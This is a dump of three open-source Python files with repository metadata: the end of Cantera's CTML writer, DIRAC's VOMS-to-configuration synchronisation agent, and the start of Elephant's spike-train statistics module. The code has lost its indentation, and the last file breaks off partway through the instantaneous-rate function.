pure numbers without attached dimensions.
"""
if D != -999.9 and E != -999.9:
self._c = (A, B, C, D, E)
else:
self._c = (A, B, C)
def build(self, p):
s = ''
for num in self._c:
s += '%g ' % num
f = p.addChild('falloff', s)
f['type'] = 'SRI'
class Lindemann(object):
"""The Lindemann falloff function."""
def __init__(self):
""" This falloff function takes no parameters."""
pass
def build(self, p):
f = p.addChild('falloff')
f['type'] = 'Lindemann'
#get_atomic_wts()
validate()
def convert(filename=None, outName=None, text=None):
import os
if filename is not None:
filename = os.path.expanduser(filename)
base = os.path.basename(filename)
root, _ = os.path.splitext(base)
dataset(root)
elif outName is None:
outName = 'STDOUT'
try:
if filename is not None:
with open(filename, 'rU') as f:
code = compile(f.read(), filename, 'exec')
else:
code = compile(text, '<string>', 'exec')
exec(code)
except SyntaxError as err:
# Show more context than the default SyntaxError message
# to help see problems in multi-line statements
if filename:
text = open(filename, 'rU').readlines()
else:
text = text.split('\n')
_printerr('%s in "%s" on line %i:\n' % (err.__class__.__name__,
err.filename,
err.lineno))
_printerr('| Line |')
for i in range(max(err.lineno-6, 0),
min(err.lineno+3, len(text))):
_printerr('| % 5i |' % (i+1), text[i].rstrip())
if i == err.lineno-1:
_printerr(' '* (err.offset+9) + '^')
_printerr()
sys.exit(3)
except Exception as err:
import traceback
if filename:
text = open(filename, 'rU').readlines()
else:
text = text.split('\n')
filename = '<string>'
tb = traceback.extract_tb(sys.exc_info()[2])
lineno = tb[-1][1]
if tb[-1][0] == filename:
# Error in input file
_printerr('%s on line %i of %s:' % (err.__class__.__name__, lineno, filename))
_printerr(err)
_printerr('\n| Line |')
for i in range(max(lineno-6, 0),
min(lineno+3, len(text))):
if i == lineno-1:
_printerr('> % 4i >' % (i+1), text[i].rstrip())
else:
_printerr('| % 4i |' % (i+1), text[i].rstrip())
else:
# Error in ctml_writer or elsewhere
traceback.print_exc()
sys.exit(4)
write(outName)
def main():
if len(sys.argv) not in (2,3):
raise ValueError('Incorrect number of command line arguments.')
convert(*sys.argv[1:])
if __name__ == "__main__":
main()
|
imitrichev/cantera
|
interfaces/cython/cantera/ctml_writer.py
|
Python
|
bsd-3-clause
| 87,633
|
[
"CRYSTAL"
] |
f8d5756548ad6fa058070aae1afeb8bd1377de195ca9478e6fedfc845a72477f
|
"""
VOMS2CSAgent performs the following operations:
- Adds new users for the given VO taking into account the VO VOMS information
- Updates the data in the CS for existing users including DIRAC group membership
-
The following options can be set for the VOMS2CSAgent.
.. literalinclude:: ../ConfigTemplate.cfg
:start-after: ##BEGIN VOMS2CSAgent
:end-before: ##END
:dedent: 2
:caption: VOMS2CSAgent options
"""
from DIRAC import S_OK, gConfig, S_ERROR
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.Core.Utilities.Proxy import executeWithUserProxy
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOOption, getUserOption
from DIRAC.ConfigurationSystem.Client.VOMS2CSSynchronizer import VOMS2CSSynchronizer
from DIRAC.FrameworkSystem.Client.NotificationClient import NotificationClient
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
__RCSID__ = "$Id$"
class VOMS2CSAgent(AgentModule):
def __init__(self, *args, **kwargs):
""" Defines default parameters
"""
super(VOMS2CSAgent, self).__init__(*args, **kwargs)
self.voList = ['any']
self.dryRun = True
self.autoAddUsers = True
self.autoModifyUsers = True
self.autoDeleteUsers = True
self.detailedReport = True
self.makeFCEntry = False
self.autoLiftSuspendedStatus = True
self.mailFrom = 'noreply@dirac.system'
def initialize(self):
""" Initialize the default parameters
"""
self.dryRun = self.am_getOption('DryRun', self.dryRun)
# # General agent options, can be overridden by VO options
self.autoAddUsers = self.am_getOption('AutoAddUsers', self.autoAddUsers)
self.autoModifyUsers = self.am_getOption('AutoModifyUsers', self.autoModifyUsers)
self.autoDeleteUsers = self.am_getOption('AutoDeleteUsers', self.autoDeleteUsers)
self.autoLiftSuspendedStatus = self.am_getOption('AutoLiftSuspendedStatus', self.autoLiftSuspendedStatus)
self.makeFCEntry = self.am_getOption('MakeHomeDirectory', self.makeFCEntry)
self.detailedReport = self.am_getOption('DetailedReport', self.detailedReport)
self.mailFrom = self.am_getOption('MailFrom', self.mailFrom)
self.voList = self.am_getOption('VO', self.voList)
if not self.voList:
return S_ERROR("Option 'VO' not configured")
if self.voList[0].lower() == "any":
result = gConfig.getSections('/Registry/VO')
if not result['OK']:
return result
self.voList = result['Value']
self.log.notice("VOs", self.voList)
return S_OK()
def execute(self):
for vo in self.voList:
voAdminUser = getVOOption(vo, "VOAdmin")
voAdminMail = None
if voAdminUser:
voAdminMail = getUserOption(voAdminUser, "Email")
voAdminGroup = getVOOption(vo, "VOAdminGroup", getVOOption(vo, "DefaultGroup"))
self.log.info('Performing VOMS sync',
'for VO %s with credentials %s@%s' % (vo, voAdminUser, voAdminGroup))
autoAddUsers = getVOOption(vo, "AutoAddUsers", self.autoAddUsers)
autoModifyUsers = getVOOption(vo, "AutoModifyUsers", self.autoModifyUsers)
autoDeleteUsers = getVOOption(vo, "AutoDeleteUsers", self.autoDeleteUsers)
autoLiftSuspendedStatus = getVOOption(vo, "AutoLiftSuspendedStatus", self.autoLiftSuspendedStatus)
vomsSync = VOMS2CSSynchronizer(vo,
autoAddUsers=autoAddUsers,
autoModifyUsers=autoModifyUsers,
autoDeleteUsers=autoDeleteUsers,
autoLiftSuspendedStatus=autoLiftSuspendedStatus)
result = self.__syncCSWithVOMS(vomsSync, # pylint: disable=unexpected-keyword-arg
proxyUserName=voAdminUser,
proxyUserGroup=voAdminGroup)
if not result['OK']:
self.log.error('Failed to perform VOMS to CS synchronization:', 'VO %s: %s' % (vo, result["Message"]))
continue
resultDict = result['Value']
newUsers = resultDict.get("NewUsers", [])
modUsers = resultDict.get("ModifiedUsers", [])
delUsers = resultDict.get("DeletedUsers", [])
susUsers = resultDict.get("SuspendedUsers", [])
csapi = resultDict.get("CSAPI")
adminMessages = resultDict.get("AdminMessages", {'Errors': [], 'Info': []})
voChanged = resultDict.get("VOChanged", False)
self.log.info("Run user results",
": new %d, modified %d, deleted %d, new/suspended %d" %
(len(newUsers), len(modUsers), len(delUsers), len(susUsers)))
if csapi.csModified:
# We have accumulated all the changes, commit them now
self.log.info("There are changes to the CS ready to be committed", "for VO %s" % vo)
if self.dryRun:
self.log.info("Dry Run: CS won't be updated")
csapi.showDiff()
else:
result = csapi.commitChanges()
if not result['OK']:
self.log.error("Could not commit configuration changes", result['Message'])
return result
self.log.notice("Configuration committed", "for VO %s" % vo)
else:
self.log.info("No changes to the CS recorded at this cycle", "for VO %s" % vo)
# Add user home directory in the file catalog
if self.makeFCEntry and newUsers:
self.log.info("Creating home directories for users", str(newUsers))
result = self.__addHomeDirectory(vo, newUsers, # pylint: disable=unexpected-keyword-arg
proxyUserName=voAdminUser,
proxyUserGroup=voAdminGroup)
if not result['OK']:
self.log.error('Failed to create user home directories:', 'VO %s: %s' % (vo, result["Message"]))
else:
for user in result['Value']['Failed']:
self.log.error("Failed to create home directory", "user: %s, operation: %s" %
(user, result['Value']['Failed'][user]))
adminMessages['Errors'].append("Failed to create home directory for user %s: operation %s" %
(user, result['Value']['Failed'][user]))
for user in result['Value']['Successful']:
adminMessages['Info'].append("Created home directory for user %s" % user)
if voChanged or self.detailedReport:
mailMsg = ""
if adminMessages['Errors']:
mailMsg += "\nErrors list:\n %s" % "\n ".join(adminMessages['Errors'])
if adminMessages['Info']:
mailMsg += "\nRun result:\n %s" % "\n ".join(adminMessages['Info'])
if self.detailedReport:
result = vomsSync.getVOUserReport()
if result['OK']:
mailMsg += '\n\n'
mailMsg += result['Value']
else:
mailMsg += 'Failed to produce a detailed user report'
mailMsg += result['Message']
if self.dryRun:
self.log.info("Dry Run: mail won't be sent")
else:
NotificationClient().sendMail(self.am_getOption('MailTo', voAdminMail),
"VOMS2CSAgent run log", mailMsg,
self.mailFrom)
return S_OK()
@executeWithUserProxy
def __syncCSWithVOMS(self, vomsSync):
return vomsSync.syncCSWithVOMS()
@executeWithUserProxy
def __addHomeDirectory(self, vo, newUsers):
fc = FileCatalog(vo=vo)
defaultVOGroup = getVOOption(vo, "DefaultGroup", "%s_user" % vo)
failed = {}
successful = {}
for user in newUsers:
result = fc.addUser(user)
if not result['OK']:
failed[user] = "addUser"
continue
dirName = '/%s/user/%s/%s' % (vo, user[0], user)
result = fc.createDirectory(dirName)
if not result['OK']:
failed[user] = "createDirectory"
continue
result = fc.changePathOwner({dirName: user}, recursive=False)
if not result['OK']:
failed[user] = "changePathOwner"
continue
result = fc.changePathGroup({dirName: defaultVOGroup}, recursive=False)
if not result['OK']:
failed[user] = "changePathGroup"
continue
successful[user] = True
return S_OK({"Successful": successful, "Failed": failed})
|
andresailer/DIRAC
|
ConfigurationSystem/Agent/VOMS2CSAgent.py
|
Python
|
gpl-3.0
| 8,324
|
[
"DIRAC"
] |
f27578cb9cf028f33baf7da1aaf91861dd5191572c3da905d9cc9846c57c22dc
|
# -*- coding: utf-8 -*-
"""
Statistical measures of spike trains (e.g., Fano factor) and functions to estimate firing rates.
:copyright: Copyright 2014-2016 by the Elephant team, see AUTHORS.txt.
:license: Modified BSD, see LICENSE.txt for details.
"""
from __future__ import division, print_function
import numpy as np
import quantities as pq
import scipy.stats
import scipy.signal
import neo
from neo.core import SpikeTrain
import elephant.conversion as conv
import elephant.kernels as kernels
import warnings
# warnings.simplefilter('always', DeprecationWarning)
def isi(spiketrain, axis=-1):
"""
Return an array containing the inter-spike intervals of the SpikeTrain.
Accepts a Neo SpikeTrain, a Quantity array, or a plain NumPy array.
If either a SpikeTrain or Quantity array is provided, the return value will
be a quantities array, otherwise a plain NumPy array. The units of
the quantities array will be the same as spiketrain.
Parameters
----------
spiketrain : Neo SpikeTrain or Quantity array or NumPy ndarray
The spike times.
axis : int, optional
The axis along which the difference is taken.
Default is the last axis.
Returns
-------
NumPy array or quantities array.
"""
if axis is None:
axis = -1
if isinstance(spiketrain, neo.SpikeTrain):
intervals = np.diff(
np.sort(spiketrain.times.view(pq.Quantity)), axis=axis)
else:
intervals = np.diff(np.sort(spiketrain), axis=axis)
return intervals
def mean_firing_rate(spiketrain, t_start=None, t_stop=None, axis=None):
"""
Return the firing rate of the SpikeTrain.
Accepts a Neo SpikeTrain, a Quantity array, or a plain NumPy array.
If either a SpikeTrain or Quantity array is provided, the return value will
be a quantities array, otherwise a plain NumPy array. The units of
the quantities array will be the inverse of the spiketrain.
The interval over which the firing rate is calculated can be optionally
controlled with `t_start` and `t_stop`
Parameters
----------
spiketrain : Neo SpikeTrain or Quantity array or NumPy ndarray
The spike times.
t_start : float or Quantity scalar, optional
The start time to use for the interval.
If not specified, retrieved from the``t_start`
attribute of `spiketrain`. If that is not present, default to
`0`. Any value from `spiketrain` below this value is ignored.
t_stop : float or Quantity scalar, optional
The stop time to use for the time points.
If not specified, retrieved from the `t_stop`
attribute of `spiketrain`. If that is not present, default to
the maximum value of `spiketrain`. Any value from
`spiketrain` above this value is ignored.
axis : int, optional
The axis over which to do the calculation.
Default is `None`, do the calculation over the flattened array.
Returns
-------
float, quantities scalar, NumPy array or quantities array.
Notes
-----
If `spiketrain` is a Quantity or Neo SpikeTrain and `t_start` or `t_stop`
are not, `t_start` and `t_stop` are assumed to have the same units as
`spiketrain`.
Raises
------
TypeError
If `spiketrain` is a NumPy array and `t_start` or `t_stop`
is a quantity scalar.
"""
if t_start is None:
t_start = getattr(spiketrain, 't_start', 0)
found_t_start = False
if t_stop is None:
if hasattr(spiketrain, 't_stop'):
t_stop = spiketrain.t_stop
else:
t_stop = np.max(spiketrain, axis=axis)
found_t_start = True
# figure out what units, if any, we are dealing with
if hasattr(spiketrain, 'units'):
units = spiketrain.units
else:
units = None
# convert everything to the same units
if hasattr(t_start, 'units'):
if units is None:
raise TypeError('t_start cannot be a Quantity if '
'spiketrain is not a quantity')
t_start = t_start.rescale(units)
elif units is not None:
t_start = pq.Quantity(t_start, units=units)
if hasattr(t_stop, 'units'):
if units is None:
raise TypeError('t_stop cannot be a Quantity if '
'spiketrain is not a quantity')
t_stop = t_stop.rescale(units)
elif units is not None:
t_stop = pq.Quantity(t_stop, units=units)
if not axis or not found_t_start:
return np.sum((spiketrain >= t_start) & (spiketrain <= t_stop),
axis=axis) / (t_stop - t_start)
else:
# this is needed to handle broadcasting between spiketrain and t_stop
t_stop_test = np.expand_dims(t_stop, axis)
return np.sum((spiketrain >= t_start) & (spiketrain <= t_stop_test),
axis=axis) / (t_stop - t_start)
# we make `cv` an alias for scipy.stats.variation for the convenience
# of former NeuroTools users
cv = scipy.stats.variation
def fanofactor(spiketrains):
"""
Evaluates the empirical Fano factor F of the spike counts of
a list of `neo.core.SpikeTrain` objects.
Given the vector v containing the observed spike counts (one per
spike train) in the time window [t0, t1], F is defined as:
F := var(v)/mean(v).
The Fano factor is typically computed for spike trains representing the
activity of the same neuron over different trials. The higher F, the larger
the cross-trial non-stationarity. In theory for a time-stationary Poisson
process, F=1.
Parameters
----------
spiketrains : list of neo.SpikeTrain objects, quantity arrays, numpy arrays or lists
Spike trains for which to compute the Fano factor of spike counts.
Returns
-------
fano : float or nan
The Fano factor of the spike counts of the input spike trains. If an
empty list is specified, or if all spike trains are empty, F:=nan.
"""
# Build array of spike counts (one per spike train)
spike_counts = np.array([len(t) for t in spiketrains])
# Compute FF
if all([count == 0 for count in spike_counts]):
fano = np.nan
else:
fano = spike_counts.var() / spike_counts.mean()
return fano
def lv(v):
"""
Calculate the measure of local variation LV for
a sequence of time intervals between events.
Given a vector v containing a sequence of intervals, the LV is
defined as:
.math $$ LV := \\frac{1}{N}\\sum_{i=1}^{N-1}
\\frac{3(isi_i-isi_{i+1})^2}
{(isi_i+isi_{i+1})^2} $$
The LV is typically computed as a substitute for the classical
coefficient of variation for sequences of events which include
some (relatively slow) rate fluctuation. As with the CV, LV=1 for
a sequence of intervals generated by a Poisson process.
Parameters
----------
v : quantity array, numpy array or list
Vector of consecutive time intervals
Returns
-------
lvar : float
The LV of the inter-spike interval of the input sequence.
Raises
------
AttributeError :
If an empty list is specified, or if the sequence has less
than two entries, an AttributeError will be raised.
ValueError :
Only vector inputs are supported. If a matrix is passed to the
function a ValueError will be raised.
References
----------
..[1] Shinomoto, S., Shima, K., & Tanji, J. (2003). Differences in spiking
patterns among cortical neurons. Neural Computation, 15, 2823–2842.
"""
# convert to array, cast to float
v = np.asarray(v)
# ensure we have enough entries
if v.size < 2:
raise AttributeError("Input size is too small. Please provide "
"an input with more than 1 entry.")
# calculate LV and return result
# raise error if input is multi-dimensional
return 3. * np.mean(np.power(np.diff(v) / (v[:-1] + v[1:]), 2))
# sigma2kw and kw2sigma only needed for oldfct_instantaneous_rate!
# to finally be taken out of Elephant
def sigma2kw(form):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
if form.upper() == 'BOX':
coeff = 2.0 * np.sqrt(3)
elif form.upper() == 'TRI':
coeff = 2.0 * np.sqrt(6)
elif form.upper() == 'EPA':
coeff = 2.0 * np.sqrt(5)
elif form.upper() == 'GAU':
coeff = 2.0 * 2.7 # > 99% of distribution weight
elif form.upper() == 'ALP':
coeff = 5.0
elif form.upper() == 'EXP':
coeff = 5.0
return coeff
def kw2sigma(form):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
return 1/sigma2kw(form)
# to finally be taken out of Elephant
def make_kernel(form, sigma, sampling_period, direction=1):
"""
Creates kernel functions for convolution.
Constructs a numeric linear convolution kernel of basic shape to be used
for data smoothing (linear low pass filtering) and firing rate estimation
from single trial or trial-averaged spike trains.
Exponential and alpha kernels may also be used to represent postynaptic
currents / potentials in a linear (current-based) model.
Parameters
----------
form : {'BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'}
Kernel form. Currently implemented forms are BOX (boxcar),
TRI (triangle), GAU (gaussian), EPA (epanechnikov), EXP (exponential),
ALP (alpha function). EXP and ALP are asymmetric kernel forms and
assume optional parameter `direction`.
sigma : Quantity
Standard deviation of the distribution associated with kernel shape.
This parameter defines the time resolution of the kernel estimate
and makes different kernels comparable (cf. [1] for symmetric kernels).
This is used here as an alternative definition to the cut-off
frequency of the associated linear filter.
sampling_period : float
Temporal resolution of input and output.
direction : {-1, 1}
Asymmetric kernels have two possible directions.
The values are -1 or 1, default is 1. The
definition here is that for direction = 1 the
kernel represents the impulse response function
of the linear filter. Default value is 1.
Returns
-------
kernel : numpy.ndarray
Array of kernel. The length of this array is always an odd
number to represent symmetric kernels such that the center bin
coincides with the median of the numeric array, i.e for a
triangle, the maximum will be at the center bin with equal
number of bins to the right and to the left.
norm : float
For rate estimates. The kernel vector is normalized such that
the sum of all entries equals unity sum(kernel)=1. When
estimating rate functions from discrete spike data (0/1) the
additional parameter `norm` allows for the normalization to
rate in spikes per second.
For example:
``rate = norm * scipy.signal.lfilter(kernel, 1, spike_data)``
m_idx : int
Index of the numerically determined median (center of gravity)
of the kernel function.
Examples
--------
To obtain single trial rate function of trial one should use::
r = norm * scipy.signal.fftconvolve(sua, kernel)
To obtain trial-averaged spike train one should use::
r_avg = norm * scipy.signal.fftconvolve(sua, np.mean(X,1))
where `X` is an array of shape `(l,n)`, `n` is the number of trials and
`l` is the length of each trial.
See also
--------
elephant.statistics.instantaneous_rate
References
----------
.. [1] Meier R, Egert U, Aertsen A, Nawrot MP, "FIND - a unified framework
for neural data analysis"; Neural Netw. 2008 Oct; 21(8):1085-93.
.. [2] Nawrot M, Aertsen A, Rotter S, "Single-trial estimation of neuronal
firing rates - from single neuron spike trains to population activity";
J. Neurosci Meth 94: 81-92; 1999.
"""
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
forms_abbreviated = np.array(['BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'])
forms_verbose = np.array(['boxcar', 'triangle', 'gaussian', 'epanechnikov',
'exponential', 'alpha'])
if form in forms_verbose:
form = forms_abbreviated[forms_verbose == form][0]
assert form.upper() in ('BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'), \
"form must be one of either 'BOX','TRI','GAU','EPA','EXP' or 'ALP'!"
assert direction in (1, -1), "direction must be either 1 or -1"
# conversion to SI units (s)
if sigma < 0:
raise ValueError('sigma must be positive!')
SI_sigma = sigma.rescale('s').magnitude
SI_time_stamp_resolution = sampling_period.rescale('s').magnitude
norm = 1. / SI_time_stamp_resolution
if form.upper() == 'BOX':
w = 2.0 * SI_sigma * np.sqrt(3)
# always odd number of bins
width = 2 * np.floor(w / 2.0 / SI_time_stamp_resolution) + 1
height = 1. / width
kernel = np.ones((1, width)) * height # area = 1
elif form.upper() == 'TRI':
w = 2 * SI_sigma * np.sqrt(6)
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
trileft = np.arange(1, halfwidth + 2)
triright = np.arange(halfwidth, 0, -1) # odd number of bins
triangle = np.append(trileft, triright)
kernel = triangle / triangle.sum() # area = 1
elif form.upper() == 'EPA':
w = 2.0 * SI_sigma * np.sqrt(5)
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
base = np.arange(-halfwidth, halfwidth + 1)
parabula = base**2
epanech = parabula.max() - parabula # inverse parabula
kernel = epanech / epanech.sum() # area = 1
elif form.upper() == 'GAU':
w = 2.0 * SI_sigma * 2.7 # > 99% of distribution weight
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution) # always odd
base = np.arange(-halfwidth, halfwidth + 1) * SI_time_stamp_resolution
g = np.exp(
-(base**2) / 2.0 / SI_sigma**2) / SI_sigma / np.sqrt(2.0 * np.pi)
kernel = g / g.sum() # area = 1
elif form.upper() == 'ALP':
w = 5.0 * SI_sigma
alpha = np.arange(
1, (
2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) +
1) * SI_time_stamp_resolution
alpha = (2.0 / SI_sigma**2) * alpha * np.exp(
-alpha * np.sqrt(2) / SI_sigma)
kernel = alpha / alpha.sum() # normalization
if direction == -1:
kernel = np.flipud(kernel)
elif form.upper() == 'EXP':
w = 5.0 * SI_sigma
expo = np.arange(
1, (
2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) +
1) * SI_time_stamp_resolution
expo = np.exp(-expo / SI_sigma)
kernel = expo / expo.sum()
if direction == -1:
kernel = np.flipud(kernel)
kernel = kernel.ravel()
m_idx = np.nonzero(kernel.cumsum() >= 0.5)[0].min()
return kernel, norm, m_idx
# to finally be taken out of Elephant
def oldfct_instantaneous_rate(spiketrain, sampling_period, form,
sigma='auto', t_start=None, t_stop=None,
acausal=True, trim=False):
"""
Estimate instantaneous firing rate by kernel convolution.
Parameters
-----------
spiketrain: 'neo.SpikeTrain'
Neo object that contains spike times, the unit of the time stamps
and t_start and t_stop of the spike train.
sampling_period : Quantity
time stamp resolution of the spike times. the same resolution will
be assumed for the kernel
form : {'BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'}
Kernel form. Currently implemented forms are BOX (boxcar),
TRI (triangle), GAU (gaussian), EPA (epanechnikov), EXP (exponential),
ALP (alpha function). EXP and ALP are asymmetric kernel forms and
assume optional parameter `direction`.
sigma : string or Quantity
Standard deviation of the distribution associated with kernel shape.
This parameter defines the time resolution of the kernel estimate
and makes different kernels comparable (cf. [1] for symmetric kernels).
This is used here as an alternative definition to the cut-off
frequency of the associated linear filter.
Default value is 'auto'. In this case, the optimized kernel width for
the rate estimation is calculated according to [1]. Note that the
automatized calculation of the kernel width ONLY works for gaussian
kernel shapes!
t_start : Quantity (Optional)
start time of the interval used to compute the firing rate, if None
assumed equal to spiketrain.t_start
Default:None
t_stop : Qunatity
End time of the interval used to compute the firing rate (included).
If none assumed equal to spiketrain.t_stop
Default:None
acausal : bool
if True, acausal filtering is used, i.e., the gravity center of the
filter function is aligned with the spike to convolve
Default:None
m_idx : int
index of the value in the kernel function vector that corresponds
to its gravity center. this parameter is not mandatory for
symmetrical kernels but it is required when asymmetrical kernels
are to be aligned at their gravity center with the event times if None
is assumed to be the median value of the kernel support
Default : None
trim : bool
if True, only the 'valid' region of the convolved
signal are returned, i.e., the points where there
isn't complete overlap between kernel and spike train
are discarded
NOTE: if True and an asymmetrical kernel is provided
the output will not be aligned with [t_start, t_stop]
Returns
-------
rate : neo.AnalogSignal
Contains the rate estimation in unit hertz (Hz).
Has a property 'rate.times' which contains the time axis of the rate
estimate. The unit of this property is the same as the resolution that
is given as an argument to the function.
Raises
------
TypeError:
If argument value for the parameter `sigma` is not a quantity object
or string 'auto'.
See also
--------
elephant.statistics.make_kernel
References
----------
..[1] H. Shimazaki, S. Shinomoto, J Comput Neurosci (2010) 29:171–182.
"""
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
if sigma == 'auto':
form = 'GAU'
unit = spiketrain.units
kernel_width = sskernel(spiketrain.magnitude, tin=None,
bootstrap=True)['optw']
sigma = kw2sigma(form) * kernel_width * unit
elif not isinstance(sigma, pq.Quantity):
raise TypeError('sigma must be either a quantities object or "auto".'
' Found: %s, value %s' % (type(sigma), str(sigma)))
kernel, norm, m_idx = make_kernel(form=form, sigma=sigma,
sampling_period=sampling_period)
units = pq.CompoundUnit(
"%s*s" % str(sampling_period.rescale('s').magnitude))
spiketrain = spiketrain.rescale(units)
if t_start is None:
t_start = spiketrain.t_start
else:
t_start = t_start.rescale(spiketrain.units)
if t_stop is None:
t_stop = spiketrain.t_stop
else:
t_stop = t_stop.rescale(spiketrain.units)
time_vector = np.zeros(int((t_stop - t_start)) + 1)
spikes_slice = spiketrain.time_slice(t_start, t_stop) \
if len(spiketrain) else np.array([])
for spike in spikes_slice:
index = int((spike - t_start))
time_vector[index] += 1
r = norm * scipy.signal.fftconvolve(time_vector, kernel, 'full')
if np.any(r < 0):
warnings.warn('Instantaneous firing rate approximation contains '
'negative values, possibly caused due to machine '
'precision errors')
if acausal:
if not trim:
r = r[m_idx:-(kernel.size - m_idx)]
elif trim:
r = r[2 * m_idx:-2 * (kernel.size - m_idx)]
t_start = t_start + m_idx * spiketrain.units
t_stop = t_stop - ((kernel.size) - m_idx) * spiketrain.units
else:
if not trim:
r = r[m_idx:-(kernel.size - m_idx)]
elif trim:
r = r[2 * m_idx:-2 * (kernel.size - m_idx)]
t_start = t_start + m_idx * spiketrain.units
t_stop = t_stop - ((kernel.size) - m_idx) * spiketrain.units
rate = neo.AnalogSignal(signal=r.reshape(r.size, 1),
sampling_period=sampling_period,
units=pq.Hz, t_start=t_start)
return rate, sigma
def instantaneous_rate(spiketrain, sampling_period, kernel='auto',
cutoff=5.0, t_start=None, t_stop=None, trim=False):
"""
Estimates instantaneous firing rate by kernel convolution.
Parameters
-----------
spiketrain : 'neo.SpikeTrain'
Neo object that contains spike times, the unit of the time stamps
and t_start and t_stop of the spike train.
sampling_period : Time Quantity
Time stamp resolution of the spike times. The same resolution will
be assumed for the kernel
kernel : string 'auto' or callable object of :class:`Kernel` from module
'kernels.py'. Currently implemented kernel forms are rectangular,
triangular, epanechnikovlike, gaussian, laplacian, exponential,
and alpha function.
Example: kernel = kernels.RectangularKernel(sigma=10*ms, invert=False)
The kernel is used for convolution with the spike train and its
standard deviation determines the time resolution of the instantaneous
rate estimation.
Default: 'auto'. In this case, the optimized kernel width for the
rate estimation is calculated according to [1] and with this width
a gaussian kernel is constructed. Automatized calculation of the
kernel width is not available for other than gaussian kernel shapes.
cutoff : float
This factor determines the cutoff of the probability distribution of
the kernel, i.e., the considered width of the kernel in terms of
multiples of the standard deviation sigma.
Default: 5.0
t_start : Time Quantity (optional)
Start time of the interval used to compute the firing rate. If None
assumed equal to spiketrain.t_start
Default: None
t_stop : Time Quantity (optional)
End time of the interval used to compute the firing rate (included).
If None assumed equal to spiketrain.t_stop
Default: None
trim : bool
if False, the output of the Fast Fourier Transformation being a longer
vector than the input vector by the size of the kernel is reduced back
to the original size of the considered time interval of the spiketrain
using the median of the kernel.
if True, only the region of the convolved signal is returned, where
there is complete overlap between kernel and spike train. This is
achieved by reducing the length of the output of the Fast Fourier
Transformation by a total of two times the size of the kernel, and
t_start and t_stop are adjusted.
Default: False
Returns
-------
rate : neo.AnalogSignal
Contains the rate estimation in unit hertz (Hz).
Has a property 'rate.times' which contains the time axis of the rate
estimate. The unit of this property is the same as the resolution that
is given via the argument 'sampling_period' to the function.
Raises
------
TypeError:
If `spiketrain` is not an instance of :class:`SpikeTrain` of Neo.
If `sampling_period` is not a time quantity.
If `kernel` is neither instance of :class:`Kernel` or string 'auto'.
If `cutoff` is neither float nor int.
If `t_start` and `t_stop` are neither None nor a time quantity.
If `trim` is not bool.
ValueError:
If `sampling_period` is smaller than zero.
Example
--------
kernel = kernels.AlphaKernel(sigma = 0.05*s, invert = True)
rate = instantaneous_rate(spiketrain, sampling_period = 2*ms, kernel)
References
----------
..[1] H. Shimazaki, S. Shinomoto, J Comput Neurosci (2010) 29:171–182.
"""
# Checks of input variables:
if not isinstance(spiketrain, SpikeTrain):
raise TypeError(
"spiketrain must be instance of :class:`SpikeTrain` of Neo!\n"
" Found: %s, value %s" % (type(spiketrain), str(spiketrain)))
if not (isinstance(sampling_period, pq.Quantity) and
sampling_period.dimensionality.simplified ==
pq.Quantity(1, "s").dimensionality):
raise TypeError(
"The sampling period must be a time quantity!\n"
" Found: %s, value %s" % (type(sampling_period), str(sampling_period)))
if sampling_period.magnitude < 0:
raise ValueError("The sampling period must be larger than zero.")
if kernel == 'auto':
kernel_width = sskernel(spiketrain.magnitude, tin=None,
bootstrap=True)['optw']
unit = spiketrain.units
sigma = 1/(2.0 * 2.7) * kernel_width * unit
# factor 2.0 connects kernel width with its half width,
# factor 2.7 connects half width of Gaussian distribution with
# 99% probability mass with its standard deviation.
kernel = kernels.GaussianKernel(sigma)
elif not isinstance(kernel, kernels.Kernel):
raise TypeError(
"kernel must be either instance of :class:`Kernel` "
"or the string 'auto'!\n"
" Found: %s, value %s" % (type(kernel), str(kernel)))
if not (isinstance(cutoff, float) or isinstance(cutoff, int)):
raise TypeError("cutoff must be float or integer!")
if not (t_start is None or (isinstance(t_start, pq.Quantity) and
t_start.dimensionality.simplified ==
pq.Quantity(1, "s").dimensionality)):
raise TypeError("t_start must be a time quantity!")
if not (t_stop is None or (isinstance(t_stop, pq.Quantity) and
t_stop.dimensionality.simplified ==
pq.Quantity(1, "s").dimensionality)):
raise TypeError("t_stop must be a time quantity!")
if not (isinstance(trim, bool)):
raise TypeError("trim must be bool!")
# main function:
units = pq.CompoundUnit("%s*s" % str(sampling_period.rescale('s').magnitude))
spiketrain = spiketrain.rescale(units)
if t_start is None:
t_start = spiketrain.t_start
else:
t_start = t_start.rescale(spiketrain.units)
if t_stop is None:
t_stop = spiketrain.t_stop
else:
t_stop = t_stop.rescale(spiketrain.units)
time_vector = np.zeros(int((t_stop - t_start)) + 1)
spikes_slice = spiketrain.time_slice(t_start, t_stop) \
if len(spiketrain) else np.array([])
for spike in spikes_slice:
index = int((spike - t_start))
time_vector[index] += 1
if cutoff < kernel.min_cutoff:
cutoff = kernel.min_cutoff
warnings.warn("The width of the kernel was adjusted to a minimally "
"allowed width.")
t_arr = np.arange(-cutoff * kernel.sigma.rescale(units).magnitude,
cutoff * kernel.sigma.rescale(units).magnitude +
sampling_period.rescale(units).magnitude,
sampling_period.rescale(units).magnitude) * units
r = scipy.signal.fftconvolve(time_vector,
kernel(t_arr).rescale(pq.Hz).magnitude, 'full')
if np.any(r < 0):
warnings.warn("Instantaneous firing rate approximation contains "
"negative values, possibly caused due to machine "
"precision errors.")
if not trim:
r = r[kernel.median_index(t_arr):-(kernel(t_arr).size -
kernel.median_index(t_arr))]
elif trim:
